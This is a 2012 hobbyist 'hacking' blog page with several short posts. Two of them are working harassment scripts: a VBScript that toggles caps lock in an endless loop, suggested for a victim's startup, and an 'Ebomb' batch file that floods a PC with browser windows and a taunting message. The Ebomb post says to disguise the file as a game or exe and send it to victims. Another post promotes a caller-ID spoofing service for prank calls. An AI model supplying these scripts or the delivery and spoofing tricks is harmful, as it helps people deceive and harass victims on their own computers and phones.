Blogger Widgets

About Ash Hacker

My photo
I am a social-techno-learner which believes in its own efficiency first and then implements with the suggestions of my strong and enthusiastic Team which helps me takes everything into its perfection level.

Thursday 19 January 2012

Toggle caps lock automatically



Hello Friends, I think all of you have seen disco light effect in which light is turning on/off continuously. Today i am discussing a small script, which will toggle caps lock key infinitely. It is VB Script which will toggle caps lock at interval of 0.1 sec. You can perform the same with other keys like Num lock and Scroll lock. I am performing with Caps lock because an LED Glows with Caps lock On and you can see effect of disco light with it or you can irritate your victim by installing this script at start-up.

Follow the Steps Given Below :

1.) Open Notepad and copy the script given below into your notepad.


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


2.) wscript.sleep 100 : Here 100 is the sleep interval between toggle in milliseconds

3.) Now Save it with extension as .vbs , like "script.vbs"

4.) Run it & see the magic.

Note : You can change the do loop to For loop. You can edit the Do Loop to control it with a counter Variable.

Below is a Modified Script which will toggle Caps Lock 50 times :


Set wshShell =wscript.CreateObject("WScript.Shell")
Dim i
i=0
do while(i<=50)
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
i=i+1
loop


You are done. Double click on this batch file to toggle your caps lock.
Enjoy Hacking.
 
 

Restrict Access to folder/file using cmd



You may have seen may software to lock the folder/files and you may also have seen batch programs to do the same. Today I am going to share with you a Basic Dos Command which will help you to Restrict Access to Folder/File. The only thing you need for this is the Administrator Access on Windows Machine.
Follow the Below Given Steps to restrict access:

1.) Open Command Prompt in Windows
 2.) Type the Following Command :
   cacls "<path of file/folder>" /E /P everyone:n
   For example: calcs "C:\users\Administrator\Desktop\Lock.txt" /E /P everyone :n
3.) Remember that path of file/folder should be in double quotes (""). You will get the following message on Success
"Processed File: C:\users\Administrator\Desktop\Lock.txt"
4.) Now when you try to open the File/Folder You will get the message "Access is denied".

Now to Unlock Folder/File and to give it the full access, follow below given steps:

1.) Open Command Prompt in Windows
2.) Type the Following Command :
   cacls "<path of file/folder>" /E /P everyone:f
   For example: calcs "C:\users\Administrator\Desktop\Lock.txt" /E /P everyone :f
3.) Remember that path of file/folder should be in double quotes (""). You will get the following message on Success
"Processed File: C:\users\Administrator\Desktop\Lock.txt"
4.) You have successfully unlocked the file/folder
 
 

Make prank calls call spoofing



If you want to fool your friends or want to see the demo of call spoofing, i have a better call spoofing service. It has many services. You can do prank calls, spoof caller id, change your voice during call. When you call someone he will see the number which you want him to see. This service is easy to use.
follow these steps:
  1. Select the country you are calling from, choose the CallerID you want to display and enter the number you want to call.
  2. Press "Get me a code" and we will provide you with number to call and a code.
  3. Call the number
  4. Enter the code and we will connect your call to your friend with the CallerID and voice you have selected.


Warning: Do not use this for any crime.


click to use this service here:
http://www.crazycall.net/
 
 

Wednesday 18 January 2012

Ebomb a virus for fun ......Through Batch command.

This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start iexplore
start notepad
start firefox


and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)



you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "http://ash-hacker.blogspot.com/
"
start firefox "http://ash-hacker.blogspot.com/
"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D

(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "
http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "http://ash-hacker.blogspot.com/
"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad

start iexplore "http://ash-hacker.blogspot.com/"
start firefox "
http://ash-hacker.blogspot.com/"
start notepad



and then simply save it as "anyname.bat"

Note : The only way to get out of any ebomb attack is simply by System restart





please comment below if this post is useful for you..

How to send password protected Email

Now a days, Email is the most common media for information interchange. It is used by most of the working person. Most of the popular email servers such as GMail, Yahoo mail, Hotmail and many other provide this email service for free. Users need to create a free account and then they can use their account for sending and recieveing emails.

But Cyber criminals are always try to hack passwords of users email account to read emails and misuse the account. Do you know? you can also protect each mail sent by you with a password for better information security. If some one maneged to get into the account, he would not be able to read the email without knowing the password. To send the password protect email, you have to use a third party service named as LockBin
  • go the link http://www.lockbin.com/lockbin.php
  • Fill the form and send the mail. And also inform receiver that you have sent the mail and password as well
  • Recipient will get the email with a link. To read the email, he will have to go the link and verifiy the password which you have entered while sending the email.
  • After submitting password Receiver can view message.
.....Ash-Hacker.

Transfer your all Facebook Friends To Google Plus


e
Recently Google launched his awaited brand new social networking site called Google+ . The Google plus v/s Facebook is the hot topic among the tech bloggers. Facebook already cross the one million users. Google want to capture the market share of social networking through google plus after orkut. Now the question is, If I am user of google plus, how can i connect with my friends which is available only in facebook? Can i transfer my facebook friends to Google plus? The answer is yes, you can transfer your all Facebook Friends To Google Plus.To export all your friends to facebook try Facebook Friend Exporter Chrome extension in google chrome.Follow below instruction to transfer your friends to google plus.
Make sure you are logged into m.facebook.com, you must be logged in for it to work.
  • Must have English version of Facebook for this to work (you can switch)
  • Do not enable SSL for Facebook use HTTP not HTTPS
  • If you need any help running this, contact me. Commenting below will be lost.
  • An “Export” button will appear on Facebooks toolbar after refresh once installed.
  • Please disable all Facebook Extensions that you have downloaded, many of them affect the page. For example “Better Facebook” breaks this extension.
This extension will allow you to get your friends information that they shared to you:
- Name
- Emails
- Phone numbers
- Screen names
- Websites
- Address
- Birthdays
Two methods of exports
  • CSV file (if you have many friends, greater than 500, it will be very slow)
  • Gmail Contacts (It will place them into a folder called “Imported from Facebook“)
Notice:
  • Your contacts will be cached, so don’t worry, you will continue where you left off.
  • This extension states “Browsing History” permission, this is needed to transfer data from Facebook Tab to the extension. Your history absolutely doesn’t get exported, it uses OAuth for authentication, so only the user logged in OAuth can get that data.

.....Ash-Hacker.

WEL-COME

You Are Welcome Heartly.......
Blogger Widgets